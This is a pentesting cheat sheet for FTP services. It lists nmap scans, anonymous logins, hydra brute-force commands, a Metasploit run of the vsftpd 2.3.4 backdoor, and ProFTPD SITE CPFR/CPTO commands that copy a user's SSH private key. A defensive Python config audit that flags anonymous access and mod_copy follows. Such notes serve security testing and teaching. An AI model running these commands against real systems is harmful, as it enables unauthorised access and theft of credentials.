
21 - Pentesting FTP

Nmap

sudo nmap -p 21 -A $IP
nmap -p 21 --script=ftp-* $IP
nmap -p 21 --script=ftp-anon.nse $IP

Anonymous login

lftp $IP
ftp $IP
> anonymous
> anonymous

ftp $IP
> anonymous
> password

Bruteforce

hydra

hydra -C /usr/share/wordlists/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt $IP ftp
hydra -l admin -P /usr/share/wordlists/rockyou.txt ftp://$IP -I

Exploit

ProFtpd

sudo nmap -p21 --script-help=ftp-proftpd-backdoor.nse
searchsploit proftpd 1.3.5

VsFtpd 2.3.4

sudo nmap -p21 --script-help=ftp-vsftpd-backdoor
searchsploit vsftpd 2.3.4
msf> use exploit/unix/ftp/vsftpd_234_backdoor
msf> show options
msf> set RHOST 192.168.0.101
msf> show options
msf> exploit

Commands

SITE CPFR /home/{TARGET_USER}/.ssh/id_rsa
SITE CPTO /var/tmp/id_rsa

SITE CPFR /home/{TARGET_USER}/.ssh/id_rsa.pub
SITE CPTO /var/tmp/id_rsa.pub
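
Config audit (added example, not part of the original notes): a defender-side check for what the Anonymous login and Commands sections probe, reporting anonymous access in vsftpd.conf / proftpd.conf and a loaded mod_copy, the ProFTPD module that implements SITE CPFR/CPTO. Function names and sample configs are constructed for illustration; a statically compiled mod_copy has no LoadModule line and is not detected here.

```python
import re

# vsftpd compiled-in defaults from vsftpd.conf(5): an absent key still applies.
VSFTPD_DEFAULTS = {"anonymous_enable": "YES", "write_enable": "NO",
                   "anon_upload_enable": "NO"}
TRUTHY = {"YES", "TRUE", "1"}

def effective_vsftpd(text):
    """Merge key=value lines over the defaults; later lines win."""
    settings = dict(VSFTPD_DEFAULTS)
    for raw in text.splitlines():
        line = raw.strip()
        if line and not line.startswith("#") and "=" in line:
            key, value = line.split("=", 1)
            settings[key.strip().lower()] = value.strip().upper()
    return settings

def audit_vsftpd(text):
    s = effective_vsftpd(text)
    findings = []
    if s["anonymous_enable"] in TRUTHY:
        findings.append("anonymous login enabled")
        if s["write_enable"] in TRUTHY and s["anon_upload_enable"] in TRUTHY:
            findings.append("anonymous upload enabled")
    return findings

def audit_proftpd(text):
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments
        if re.match(r"LoadModule\s+mod_copy\.c\b", line, re.I):
            findings.append("mod_copy loaded: SITE CPFR/CPTO available")
        elif re.match(r"<Anonymous\b", line, re.I):
            findings.append("<Anonymous> section: anonymous login configured")
    return findings

# Constructed sample configs (not taken from any real host).
VSFTPD_SILENT = "listen=YES\nlocal_enable=YES\n"  # key absent -> default YES
VSFTPD_HARDENED = "anonymous_enable=NO\nlocal_enable=YES\n"
PROFTPD_WEAK = "LoadModule mod_copy.c\n<Anonymous ~ftp>\n  User ftp\n</Anonymous>\n"
PROFTPD_HARDENED = "#LoadModule mod_copy.c\nLoadModule mod_tls.c\n"

if __name__ == "__main__":
    for name, fn, cfg in [("vsftpd silent", audit_vsftpd, VSFTPD_SILENT),
                          ("vsftpd hardened", audit_vsftpd, VSFTPD_HARDENED),
                          ("proftpd weak", audit_proftpd, PROFTPD_WEAK),
                          ("proftpd hardened", audit_proftpd, PROFTPD_HARDENED)]:
        print(name, "->", fn(cfg) or "no findings")
```

A vsftpd.conf that never mentions anonymous_enable is still reported, because the daemon's built-in default is YES.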